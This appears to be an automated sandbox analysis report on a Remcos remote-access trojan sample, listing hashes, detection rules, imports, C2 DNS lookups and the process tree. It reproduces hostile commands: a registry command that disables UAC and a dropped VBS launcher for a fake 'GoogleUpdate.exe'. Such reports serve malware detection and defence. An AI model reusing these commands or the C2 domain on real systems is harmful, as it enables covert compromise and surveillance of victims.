                              • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer, Description: detects Windows exceutables potentially bypassing UAC using eventvwr.exe, Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe, Author: ditekSHen
                              Antivirus:
                              • Antivirus: Avira, Detection: 100%
                              • Antivirus: Joe Sandbox ML, Detection: 100%
                              • Antivirus: ReversingLabs, Detection: 89%
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B..!...r...r...r.S r...r.S"r...r.S#r...r..Ur...r.o.r...r...s...r...s<..r...s$..r..Br...r...r*..r...sg..r...r...r...s...rRich...r................PE..L......c.................D...........'.......`....@.........................................................................X........`...I.......................9......8...........................H...@............`...............................text...KC.......D.................. ..`.rdata...s...`...t...H..............@..@.data...,\..........................@....tls.........@......................@....gfids..0....P......................@..@.rsrc....I...`...J..................@..@.reloc...9.......:..................@..B........................................................................................................................................................................................................
                              Process:C:\Users\user\Desktop\DB5rQYsfd6.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):26
                              Entropy (8bit):3.95006375643621
                              Encrypted:false
                              SSDEEP:3:ggPYV:rPYV
                              MD5:187F488E27DB4AF347237FE461A079AD
                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                              Malicious:true
                              Preview:[ZoneTransfer]....ZoneId=0
                              Process:C:\ProgramData\GoogleDat\GoogleUpdate.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):288
                              Entropy (8bit):3.3264850572432407
                              Encrypted:false
                              SSDEEP:6:MlsPl4xb5YcIeeDAlOWAAe5q1gWAAe5q1gWAv:tgec0WFe5BWFe5BW+
                              MD5:C25D2B34901992449E5AF26CE5F33BC7
                              SHA1:53FD65232E80DA3FF456E990982AEEAE81BF8D96
                              SHA-256:3E2091024041EBA7B736B54F9453719DC9E4692F1B703EE75F564C14A4F25F30
                              SHA-512:57164FB3BF62602ABB920E0B61AE8080BD1E3CF53658C840008246E2FFC00FAEFE71485A9F01204614658C21156D4A9927DE563E7A155A4DBAD39166B09ADB03
                              Malicious:true
                              Yara Hits:
                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\bootdata\logs.dat, Author: Joe Security
                              Preview:....[.2.0.2.5./.0.1./.1.1. .1.4.:.0.6.:.5.8. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....[.W.i.n.].r.....[.R.u.n.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....[.W.i.n.].r.....[.R.u.n.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....
                              Process:C:\Users\user\Desktop\DB5rQYsfd6.exe
                              File Type:data
                              Category:modified
                              Size (bytes):404
                              Entropy (8bit):3.47888963064342
                              Encrypted:false
                              SSDEEP:12:4D8o++ugypjBQMBvFQ4lOnbpZjeF0M/0aimi:4Dh+S0FNObHjeF0Nait
                              MD5:BB683902F4D897285B9EB79D71A86DF6
                              SHA1:6CA60977902F02B72AFD24CAA65BE77D06692B09
                              SHA-256:1829D2480AB6BBFE942AADF34CB74CCD651427D10A9B51B222923FB921EBFC70
                              SHA-512:EDBB9B416AD84CE216ED18DB11CBED0B46A079B7B2463E942B809A8A2FE5540EB1101114C5D0944DA383C02617DEC1017DF1235949CAF24EB515550F456EAEDA
                              Malicious:true
                              Antivirus:
                              • Antivirus: Avira, Detection: 100%
                              Preview:W.S.c.r.i.p.t...S.l.e.e.p. .1.0.0.0...S.e.t. .f.s.o. .=. .C.r.e.a.t.e.O.b.j.e.c.t.(.".S.c.r.i.p.t.i.n.g...F.i.l.e.S.y.s.t.e.m.O.b.j.e.c.t.".)...C.r.e.a.t.e.O.b.j.e.c.t.(.".W.S.c.r.i.p.t...S.h.e.l.l.".)...R.u.n. .".c.m.d. ./.c. .".".C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.G.o.o.g.l.e.D.a.t.\.G.o.o.g.l.e.U.p.d.a.t.e...e.x.e.".".".,. .0...f.s.o...D.e.l.e.t.e.F.i.l.e.(.W.s.c.r.i.p.t...S.c.r.i.p.t.F.u.l.l.N.a.m.e.).
                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                              Entropy (8bit):6.5897169192258875
                              TrID:
                              • Win32 Executable (generic) a (10002005/4) 99.96%
                              • Generic Win/DOS Executable (2004/3) 0.02%
                              • DOS Executable Generic (2002/1) 0.02%
                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                              File name:DB5rQYsfd6.exe
                              File size:480'256 bytes
                              MD5:991e707e324731f86a43900e34070808
                              SHA1:5b5afd8cecb865de3341510f38d217f47490eead
                              SHA256:32d8c2a1bb4d5a515d9eb36c1286b0ac08624c8ea3df0e97f12391558ce81153
                              SHA512:07411dffbc6beff08a901afa8db3af4bc7d214407f7b20a8570e16b3900f512ad8ee2d04e31bb9d870585b9825e9102078f6c40eb6df292f09fffe57eea37f79
                              SSDEEP:12288:wmnk7iLJbpIpiRL6I2WhSKQ9ZsfZQScn9:wiLJbpI7I2WhQqZ7c9
                              TLSH:E2A4AE02BAD2C072D57161344D2AE735DABDBC212835997BB3E61D5BFD30180A73A7B2
                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B..!...r...r...r.S r...r.S"r...r.S#r...r..Ur...r.o.r...r...s...r...s<..r...s$..r..Br...r...r*..r...sg..r...r...r...s...rRich...
                              Icon Hash:95694d05214c1b33
                              Entrypoint:0x4327a4
                              Entrypoint Section:.text
                              Digitally signed:false
                              Imagebase:0x400000
                              Subsystem:windows gui
                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                              DLL Characteristics:TERMINAL_SERVER_AWARE
                              Time Stamp:0x63011007 [Sat Aug 20 16:47:03 2022 UTC]
                              TLS Callbacks:
                              CLR (.Net) Version:
                              OS Version Major:5
                              OS Version Minor:1
                              File Version Major:5
                              File Version Minor:1
                              Subsystem Version Major:5
                              Subsystem Version Minor:1
                              Import Hash:5d354883fe6f15fcf48045037a99fb7a
                              Instruction
                              call 00007F30ACBDE9B7h
                              jmp 00007F30ACBDE403h
                              push ebp
                              mov ebp, esp
                              sub esp, 00000324h
                              push ebx
                              push esi
                              push 00000017h
                              call 00007F30ACC0008Fh
                              test eax, eax
                              je 00007F30ACBDE577h
                              mov ecx, dword ptr [ebp+08h]
                              int 29h
                              xor esi, esi
                              lea eax, dword ptr [ebp-00000324h]
                              push 000002CCh
                              push esi
                              push eax
                              mov dword ptr [0046ED04h], esi
                              call 00007F30ACBE09C2h
                              add esp, 0Ch
                              mov dword ptr [ebp-00000274h], eax
                              mov dword ptr [ebp-00000278h], ecx
                              mov dword ptr [ebp-0000027Ch], edx
                              mov dword ptr [ebp-00000280h], ebx
                              mov dword ptr [ebp-00000284h], esi
                              mov dword ptr [ebp-00000288h], edi
                              mov word ptr [ebp-0000025Ch], ss
                              mov word ptr [ebp-00000268h], cs
                              mov word ptr [ebp-0000028Ch], ds
                              mov word ptr [ebp-00000290h], es
                              mov word ptr [ebp-00000294h], fs
                              mov word ptr [ebp-00000298h], gs
                              pushfd
                              pop dword ptr [ebp-00000264h]
                              mov eax, dword ptr [ebp+04h]
                              mov dword ptr [ebp-0000026Ch], eax
                              lea eax, dword ptr [ebp+04h]
                              mov dword ptr [ebp-00000260h], eax
                              mov dword ptr [ebp-00000324h], 00010001h
                              mov eax, dword ptr [eax-04h]
                              push 00000050h
                              mov dword ptr [ebp-00000270h], eax
                              lea eax, dword ptr [ebp-58h]
                              push esi
                              push eax
                              call 00007F30ACBE0939h
                              Programming Language:
                              • [C++] VS2008 SP1 build 30729
                              • [IMP] VS2008 SP1 build 30729
                              NameVirtual AddressVirtual Size Is in Section
                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_IMPORT0x6ba580xf0.rdata
                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x760000x490c.rsrc
                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x7b0000x39ac.reloc
                              IMAGE_DIRECTORY_ENTRY_DEBUG0x69f100x38.rdata
                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                              IMAGE_DIRECTORY_ENTRY_TLS0x69fa40x18.rdata
                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x69f480x40.rdata
                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_IAT0x560000x4ac.rdata
                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                              .text0x10000x5434b0x54400d720cbda6f644b704b35ac907cc56d49False0.574827290430267data6.624462527244835IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              .rdata0x560000x173920x174007f74ade58c43b15ee0754893e037c956False0.5001050067204301data5.8556949326481496IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                              .data0x6e0000x5c2c0xe00121423e4a98fa367c6f6bf7e0478d052False0.21986607142857142data2.967957166860955IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              .tls0x740000x90x2001f354d76203061bfdd5a53dae48d5435False0.033203125data0.020393135236084953IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              .gfids0x750000x2300x400c42969612e5c912b6c5d217fb5c3eeb3False0.3203125data2.368295399421673IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                              .rsrc0x760000x490c0x4a00a6b5568709acacd40b158841099b0873False0.25897381756756754data3.827761755523793IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                              .reloc0x7b0000x39ac0x3a00fdc450eb9b0c8ffc8324fb61b541b328False0.7665005387931034data6.71659520483491IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                              NameRVASizeTypeLanguageCountryZLIB Complexity
                              RT_ICON0x7618c0x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.3421985815602837
                              RT_ICON0x765f40x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States0.27704918032786885
                              RT_ICON0x76f7c0x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.23686679174484052
                              RT_ICON0x780240x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.22977178423236513
                              RT_RCDATA0x7a5cc0x2ffdata1.014341590612777
                              RT_GROUP_ICON0x7a8cc0x3edataEnglishUnited States0.8064516129032258
                              DLLImport
                              KERNEL32.dllCopyFileW, CreateMutexA, GetLocaleInfoA, CreateToolhelp32Snapshot, OpenMutexA, Process32NextW, Process32FirstW, VirtualProtect, SetLastError, VirtualFree, VirtualAlloc, GetNativeSystemInfo, HeapAlloc, GetProcessHeap, FreeLibrary, IsBadReadPtr, GetTempPathW, OpenProcess, lstrcatW, GetCurrentProcessId, GetTempFileNameW, GetCurrentProcess, GetSystemDirectoryA, GlobalAlloc, GlobalLock, GetTickCount, GlobalUnlock, WriteProcessMemory, ResumeThread, GetThreadContext, ReadProcessMemory, CreateProcessW, SetThreadContext, LocalAlloc, GlobalFree, MulDiv, SizeofResource, SetFilePointer, FindResourceA, LockResource, LoadResource, LocalFree, FormatMessageA, AllocConsole, GetModuleFileNameA, lstrcpynA, QueryPerformanceFrequency, GetLongPathNameW, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSection, DeleteCriticalSection, HeapSize, WriteConsoleW, SetStdHandle, SetEnvironmentVariableW, SetEnvironmentVariableA, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, GetCommandLineA, GetOEMCP, IsValidCodePage, FindFirstFileExA, ReadConsoleW, GetConsoleMode, GetConsoleCP, FlushFileBuffers, GetFileType, GetTimeZoneInformation, EnumSystemLocalesW, GetUserDefaultLCID, IsValidLocale, GetTimeFormatW, GetDateFormatW, HeapReAlloc, GetACP, GetStdHandle, GetModuleHandleExW, MoveFileExW, RtlUnwind, RaiseException, LoadLibraryExW, GetCPInfo, GetStringTypeW, GetLocaleInfoW, LCMapStringW, CompareStringW, TlsFree, TlsSetValue, ExpandEnvironmentStringsA, FindNextFileA, FindFirstFileA, GetFileSize, TerminateThread, GetLastError, SetFileAttributesW, GetModuleHandleA, RemoveDirectoryW, MoveFileW, CreateDirectoryW, SetFilePointerEx, GetLogicalDriveStringsA, DeleteFileW, DeleteFileA, GetFileAttributesW, FindClose, lstrlenA, GetDriveTypeA, FindNextFileW, GetFileSizeEx, FindFirstFileW, ExitProcess, GetProcAddress, LoadLibraryA, CreateProcessA, PeekNamedPipe, CreatePipe, TerminateProcess, ReadFile, HeapFree, HeapCreate, CreateEventA, GetLocalTime, CreateThread, SetEvent, CreateEventW, WaitForSingleObject, Sleep, GetModuleFileNameW, CloseHandle, ExitThread, CreateFileW, WriteFile, QueryPerformanceCounter, TlsGetValue, TlsAlloc, InitializeCriticalSectionAndSpinCount, MultiByteToWideChar, DecodePointer, EncodePointer, WideCharToMultiByte, InitializeSListHead, GetSystemTimeAsFileTime, GetCurrentThreadId, IsProcessorFeaturePresent, GetStartupInfoW, SetUnhandledExceptionFilter, UnhandledExceptionFilter, IsDebuggerPresent, GetModuleHandleW, WaitForSingleObjectEx, ResetEvent, SetEndOfFile
                              USER32.dllCallNextHookEx, GetKeyboardLayoutNameA, GetKeyState, GetWindowTextLengthW, GetWindowThreadProcessId, SetForegroundWindow, SetClipboardData, EnumWindows, ExitWindowsEx, TranslateMessage, DispatchMessageA, GetMessageA, GetWindowTextW, wsprintfW, GetClipboardData, UnhookWindowsHookEx, GetForegroundWindow, ToUnicodeEx, GetKeyboardLayout, SetWindowsHookExA, CloseClipboard, OpenClipboard, GetKeyboardState, DrawIcon, GetSystemMetrics, GetIconInfo, SystemParametersInfoW, GetCursorPos, RegisterClassExA, AppendMenuA, mouse_event, CreateWindowExA, DefWindowProcA, TrackPopupMenu, CreatePopupMenu, EnumDisplaySettingsW, SendInput, CloseWindow, EmptyClipboard, ShowWindow, SetWindowTextW, MessageBoxW, IsWindowVisible
                              GDI32.dllCreateCompatibleBitmap, SelectObject, CreateCompatibleDC, StretchBlt, GetDIBits, DeleteDC, DeleteObject, CreateDCA, GetObjectA
                              ADVAPI32.dllCryptAcquireContextA, CryptGenRandom, CryptReleaseContext, GetUserNameW, RegEnumKeyExA, QueryServiceStatus, CloseServiceHandle, OpenSCManagerW, OpenSCManagerA, ControlService, StartServiceW, QueryServiceConfigW, ChangeServiceConfigW, OpenServiceW, EnumServicesStatusW, AdjustTokenPrivileges, LookupPrivilegeValueA, OpenProcessToken, RegCreateKeyA, RegCloseKey, RegQueryInfoKeyW, RegQueryValueExA, RegCreateKeyExW, RegEnumKeyExW, RegSetValueExW, RegSetValueExA, RegOpenKeyExA, RegOpenKeyExW, RegCreateKeyW, RegDeleteValueW, RegEnumValueW, RegQueryValueExW, RegDeleteKeyA
                              SHELL32.dllShellExecuteExA, Shell_NotifyIconA, ExtractIconA, ShellExecuteW
                              SHLWAPI.dllStrToIntA, PathFileExistsW, PathFileExistsA
                              WINMM.dllwaveInPrepareHeader, waveInStop, waveInUnprepareHeader, mciSendStringA, PlaySoundW, waveInOpen, waveInStart, waveInAddBuffer, waveInClose, mciSendStringW
                              WS2_32.dllWSAGetLastError, recv, connect, socket, send, WSAStartup, closesocket, inet_ntoa, gethostbyname, WSASetLastError, inet_addr, gethostbyaddr, getservbyport, ntohs, getservbyname, htons, htonl
                              urlmon.dllURLDownloadToFileW, URLOpenBlockingStreamW
                              gdiplus.dllGdiplusStartup, GdipGetImageEncoders, GdipCloneImage, GdipAlloc, GdipDisposeImage, GdipFree, GdipGetImageEncodersSize, GdipSaveImageToStream, GdipLoadImageFromStream
                              WININET.dllInternetOpenUrlW, InternetCloseHandle, InternetReadFile, InternetOpenW
                              Language of compilation systemCountry where language is spokenMap
                              EnglishUnited States
                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                              Jan 11, 2025 20:06:59.274513960 CET192.168.2.41.1.1.10x4b41Standard query (0)apleegodfivem.ddns.netA (IP address)IN (0x0001)false
                              Jan 11, 2025 20:07:04.415268898 CET192.168.2.41.1.1.10x494dStandard query (0)apleegodfivem.ddns.netA (IP address)IN (0x0001)false
                              Jan 11, 2025 20:07:09.538820982 CET192.168.2.41.1.1.10xa93aStandard query (0)apleegodfivem.ddns.netA (IP address)IN (0x0001)false
                              Jan 11, 2025 20:07:14.732136011 CET192.168.2.41.1.1.10xd280Standard query (0)apleegodfivem.ddns.netA (IP address)IN (0x0001)false
                              Jan 11, 2025 20:07:19.820209026 CET192.168.2.41.1.1.10x9242Standard query (0)apleegodfivem.ddns.netA (IP address)IN (0x0001)false
                              Jan 11, 2025 20:07:24.929440975 CET192.168.2.41.1.1.10x8eb2Standard query (0)apleegodfivem.ddns.netA (IP address)IN (0x0001)false
                              Jan 11, 2025 20:07:30.014278889 CET192.168.2.41.1.1.10xadfcStandard query (0)apleegodfivem.ddns.netA (IP address)IN (0x0001)false
                              Jan 11, 2025 20:07:34.866699934 CET192.168.2.41.1.1.10xe45eStandard query (0)apleegodfivem.ddns.netA (IP address)IN (0x0001)false
                              Jan 11, 2025 20:07:39.777354956 CET192.168.2.41.1.1.10x777Standard query (0)apleegodfivem.ddns.netA (IP address)IN (0x0001)false
                              Jan 11, 2025 20:07:44.367064953 CET192.168.2.41.1.1.10xb310Standard query (0)apleegodfivem.ddns.netA (IP address)IN (0x0001)false
                              Jan 11, 2025 20:07:50.554352045 CET192.168.2.41.1.1.10xf8efStandard query (0)apleegodfivem.ddns.netA (IP address)IN (0x0001)false
                              Jan 11, 2025 20:07:55.523149014 CET192.168.2.41.1.1.10xb4deStandard query (0)apleegodfivem.ddns.netA (IP address)IN (0x0001)false
                              Jan 11, 2025 20:08:00.350819111 CET192.168.2.41.1.1.10x3685Standard query (0)apleegodfivem.ddns.netA (IP address)IN (0x0001)false
                              Jan 11, 2025 20:08:05.288407087 CET192.168.2.41.1.1.10x78c3Standard query (0)apleegodfivem.ddns.netA (IP address)IN (0x0001)false
                              Jan 11, 2025 20:08:11.370599031 CET192.168.2.41.1.1.10x8680Standard query (0)apleegodfivem.ddns.netA (IP address)IN (0x0001)false
                              Jan 11, 2025 20:08:16.804186106 CET192.168.2.41.1.1.10x91ffStandard query (0)apleegodfivem.ddns.netA (IP address)IN (0x0001)false
                              Jan 11, 2025 20:08:22.309706926 CET192.168.2.41.1.1.10x5eebStandard query (0)apleegodfivem.ddns.netA (IP address)IN (0x0001)false
                              Jan 11, 2025 20:08:27.710262060 CET192.168.2.41.1.1.10xdde0Standard query (0)apleegodfivem.ddns.netA (IP address)IN (0x0001)false
                              Jan 11, 2025 20:08:33.022811890 CET192.168.2.41.1.1.10x9e05Standard query (0)apleegodfivem.ddns.netA (IP address)IN (0x0001)false
                              Jan 11, 2025 20:08:38.104075909 CET192.168.2.41.1.1.10x8cf3Standard query (0)apleegodfivem.ddns.netA (IP address)IN (0x0001)false
                              Jan 11, 2025 20:08:42.289578915 CET192.168.2.41.1.1.10x9981Standard query (0)apleegodfivem.ddns.netA (IP address)IN (0x0001)false
                              Jan 11, 2025 20:08:48.118936062 CET192.168.2.41.1.1.10x4229Standard query (0)apleegodfivem.ddns.netA (IP address)IN (0x0001)false
                              Jan 11, 2025 20:08:53.303981066 CET192.168.2.41.1.1.10xe410Standard query (0)apleegodfivem.ddns.netA (IP address)IN (0x0001)false
                              Jan 11, 2025 20:08:58.429270983 CET192.168.2.41.1.1.10xac04Standard query (0)apleegodfivem.ddns.netA (IP address)IN (0x0001)false
                              Jan 11, 2025 20:09:03.289273024 CET192.168.2.41.1.1.10x415fStandard query (0)apleegodfivem.ddns.netA (IP address)IN (0x0001)false
                              Jan 11, 2025 20:09:08.600857973 CET192.168.2.41.1.1.10x9871Standard query (0)apleegodfivem.ddns.netA (IP address)IN (0x0001)false
                              Jan 11, 2025 20:09:13.317953110 CET192.168.2.41.1.1.10xbedStandard query (0)apleegodfivem.ddns.netA (IP address)IN (0x0001)false
                              Jan 11, 2025 20:09:18.827135086 CET192.168.2.41.1.1.10xc71cStandard query (0)apleegodfivem.ddns.netA (IP address)IN (0x0001)false
                              Jan 11, 2025 20:09:24.101114035 CET192.168.2.41.1.1.10xd0bdStandard query (0)apleegodfivem.ddns.netA (IP address)IN (0x0001)false
                              Jan 11, 2025 20:09:28.304354906 CET192.168.2.41.1.1.10x1152Standard query (0)apleegodfivem.ddns.netA (IP address)IN (0x0001)false
                              Jan 11, 2025 20:09:33.633035898 CET192.168.2.41.1.1.10x82e2Standard query (0)apleegodfivem.ddns.netA (IP address)IN (0x0001)false
                              Jan 11, 2025 20:09:38.288865089 CET192.168.2.41.1.1.10x856dStandard query (0)apleegodfivem.ddns.netA (IP address)IN (0x0001)false
                              Jan 11, 2025 20:09:43.364773035 CET192.168.2.41.1.1.10x3709Standard query (0)apleegodfivem.ddns.netA (IP address)IN (0x0001)false
                              Jan 11, 2025 20:09:48.523138046 CET192.168.2.41.1.1.10xc578Standard query (0)apleegodfivem.ddns.netA (IP address)IN (0x0001)false
                              Jan 11, 2025 20:09:53.288700104 CET192.168.2.41.1.1.10x9944Standard query (0)apleegodfivem.ddns.netA (IP address)IN (0x0001)false
                              Jan 11, 2025 20:09:59.339991093 CET192.168.2.41.1.1.10x7ccaStandard query (0)apleegodfivem.ddns.netA (IP address)IN (0x0001)false
                              Jan 11, 2025 20:10:04.288410902 CET192.168.2.41.1.1.10xb773Standard query (0)apleegodfivem.ddns.netA (IP address)IN (0x0001)false
                              Jan 11, 2025 20:10:09.290155888 CET192.168.2.41.1.1.10x4525Standard query (0)apleegodfivem.ddns.netA (IP address)IN (0x0001)false
                              Jan 11, 2025 20:10:14.695435047 CET192.168.2.41.1.1.10x806eStandard query (0)apleegodfivem.ddns.netA (IP address)IN (0x0001)false
                              Jan 11, 2025 20:10:20.132447004 CET192.168.2.41.1.1.10x9a02Standard query (0)apleegodfivem.ddns.netA (IP address)IN (0x0001)false
                              Jan 11, 2025 20:10:24.840306997 CET192.168.2.41.1.1.10x1ef5Standard query (0)apleegodfivem.ddns.netA (IP address)IN (0x0001)false
                              Jan 11, 2025 20:10:29.293070078 CET192.168.2.41.1.1.10xcdbcStandard query (0)apleegodfivem.ddns.netA (IP address)IN (0x0001)false
                              Jan 11, 2025 20:10:34.289505959 CET192.168.2.41.1.1.10xa7ccStandard query (0)apleegodfivem.ddns.netA (IP address)IN (0x0001)false
                              Jan 11, 2025 20:10:39.335654974 CET192.168.2.41.1.1.10xf625Standard query (0)apleegodfivem.ddns.netA (IP address)IN (0x0001)false
                              Jan 11, 2025 20:10:44.292953014 CET192.168.2.41.1.1.10x898eStandard query (0)apleegodfivem.ddns.netA (IP address)IN (0x0001)false
                              Jan 11, 2025 20:10:49.288759947 CET192.168.2.41.1.1.10x2452Standard query (0)apleegodfivem.ddns.netA (IP address)IN (0x0001)false
                              Jan 11, 2025 20:10:54.523364067 CET192.168.2.41.1.1.10x8374Standard query (0)apleegodfivem.ddns.netA (IP address)IN (0x0001)false
                              Jan 11, 2025 20:10:59.429378033 CET192.168.2.41.1.1.10xc997Standard query (0)apleegodfivem.ddns.netA (IP address)IN (0x0001)false
                              Jan 11, 2025 20:11:05.226679087 CET192.168.2.41.1.1.10xdcdfStandard query (0)apleegodfivem.ddns.netA (IP address)IN (0x0001)false

                              Click to jump to process

                              Click to jump to process

                              Click to dive into process behavior distribution

                              Click to jump to process

                              Target ID:0
                              Start time:14:06:56
                              Start date:11/01/2025
                              Path:C:\Users\user\Desktop\DB5rQYsfd6.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\Desktop\DB5rQYsfd6.exe"
                              Imagebase:0x400000
                              File size:480'256 bytes
                              MD5 hash:991E707E324731F86A43900E34070808
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000000.1664470390.0000000000456000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000000.1664470390.0000000000456000.00000002.00000001.01000000.00000003.sdmp, Author: unknown
                              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000003.1665273424.000000000054C000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmp, Author: unknown
                              Reputation:low
                              Has exited:true

                              Target ID:1
                              Start time:14:06:56
                              Start date:11/01/2025
                              Path:C:\Windows\SysWOW64\cmd.exe
                              Wow64 process (32bit):true
                              Commandline:/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
                              Imagebase:0x240000
                              File size:236'544 bytes
                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:false

                              Target ID:2
                              Start time:14:06:56
                              Start date:11/01/2025
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff7699e0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:false

                              Target ID:3
                              Start time:14:06:56
                              Start date:11/01/2025
                              Path:C:\Windows\SysWOW64\reg.exe
                              Wow64 process (32bit):true
                              Commandline:C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
                              Imagebase:0xa20000
                              File size:59'392 bytes
                              MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:4
                              Start time:14:06:56
                              Start date:11/01/2025
                              Path:C:\Windows\SysWOW64\wscript.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\install.vbs"
                              Imagebase:0xb40000
                              File size:147'456 bytes
                              MD5 hash:FF00E0480075B095948000BDC66E81F0
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:8
                              Start time:14:06:58
                              Start date:11/01/2025
                              Path:C:\Windows\SysWOW64\cmd.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\cmd.exe" /c "C:\ProgramData\GoogleDat\GoogleUpdate.exe"
                              Imagebase:0x240000
                              File size:236'544 bytes
                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:false

                              Target ID:9
                              Start time:14:06:58
                              Start date:11/01/2025
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff7699e0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:false

                              Target ID:10
                              Start time:14:06:58
                              Start date:11/01/2025
                              Path:C:\ProgramData\GoogleDat\GoogleUpdate.exe
                              Wow64 process (32bit):true
                              Commandline:C:\ProgramData\GoogleDat\GoogleUpdate.exe
                              Imagebase:0x400000
                              File size:480'256 bytes
                              MD5 hash:991E707E324731F86A43900E34070808
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security
